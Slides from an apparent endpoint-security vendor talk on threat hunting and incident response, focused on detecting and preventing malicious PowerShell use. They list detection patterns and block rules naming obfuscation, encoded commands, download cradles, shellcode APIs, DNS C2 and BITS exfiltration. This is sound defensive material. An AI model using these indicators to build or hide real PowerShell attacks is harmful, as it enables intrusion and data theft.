  • 5. Total Endpoint Protection: #1 in EDR & Next-Gen AV REFRESHER: WHY? Prepare? It’s very hard to defend what you can’t see and don’t understand. Be proactive? Don’t wait for the bad to happen, then have to react to fix. Fix stuff? Especially before it breaks!
  • 6. Total Endpoint Protection: #1 in EDR & Next-Gen AV Time to Change. Intelligence is the ability to adapt to change. -- Stephen Hawking
  • 7. Total Endpoint Protection: #1 in EDR & Next-Gen AV The Hunting Process Motivation + Hypothesis Data Collection Tooling / Analysis Outcomes Automation
  • 8. Total Endpoint Protection: #1 in EDR & Next-Gen AV I’m Hunting! Now What? o We’re Giving Back! – Incidents – Detection improvements / new collection techniques – Prevention with confidence – Improve response / triage – Configuration management / compliance / audit
  • 9. Total Endpoint Protection: #1 in EDR & Next-Gen AV Incident Response Process Prepare Detect Respond Contain / Eradicate Post- Mortem / Prevent
  • 10. Total Endpoint Protection: #1 in EDR & Next-Gen AV Prepare Detect Respond Contain / Eradicate Post- Mortem / Prevent Motivation + Hypothesis Data Collection Tooling / Analysis Outcomes Automation* Incident Response Process Hunting Process Use blind spots/gaps as sources of motivation + hypothesis High fidelity detections Escalated incident New data collection & analysis techniques improve triage & response SOPs
  • 11. Total Endpoint Protection: #1 in EDR & Next-Gen AV Hunting: A Deeper Dive o Previous outcomes create new motivation + hypothesis’ o Introducing new datasets to expand previous outcomes o Data stacking becomes more crucial to the journey to analysis/data science
  • 12. Total Endpoint Protection: #1 in EDR & Next-Gen AV EXPANDED HUNTING: POWERSHELL
  • 13. Total Endpoint Protection: #1 in EDR & Next-Gen AV File-less Techniques PowerShell Process Execution Persistence Network Comms Service Registry Hidden Obfuscated Encoded Download Commands Shellcode DLL Execution Parent/child Profiling Int2Ext Profiling DNS Queries Service = commandline:powershell or .ps* Registry = commandline:powershell or .ps* commandLine:hidden|1|-nop|iex|- invoke|ICM|scriptblock, commandLine:`|1|^|+|$|*|&|. commandLine:nop|nonl|nol|bypass|e|enc|ec commandLine:DownloadFile|IWE|Invoke-WebRequest|IRM|Invoke- RestMethod|DownloadString|BITS commandLine:dllimport| virtualalloc Parent:wscript|mshta|M SOffice|Browser|WMI* Connections à Filter:isExternalConnection:True URL: .ps* DNS Query: TXT C2 DNS Query: Received vs. Transmitted Ratios
  • 14. Total Endpoint Protection: #1 in EDR & Next-Gen AV Giving Back…Incident Escalation o Incident 1: PowerShell Web Client – Downloading Stage 2 Payload o Incident 2: Remote .ps file execution / invoking shellcode o Incident 3: Mismatched Services – Adversarial use of .ps o Incident 4: Data Exfil – Powershell BITSTransfer
  • 15. Total Endpoint Protection: #1 in EDR & Next-Gen AV Giving Back…Prevention o Block execution of PowerShell.exe on all systems where it’s not in use for administrative purposes o Force specific Parent/Child Process Relationships – MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe o Anchor PowerShell scripts to a specific server directories, block .ps* from running directly on a system o Use endpoint firewall to prevent PowerShell.exe from connecting to non- approved Ips o Block “Bypass” “Hidden” “Download String” “WebClient” “DLLImport” “VirtualAlloc” as a command line argument for execution by an unauthorized user o See #2 for allowing valid applications
  • 16. Total Endpoint Protection: #1 in EDR & Next-Gen AV Thank you! Questions? jayson.wehrend@cybereason.com @cybereason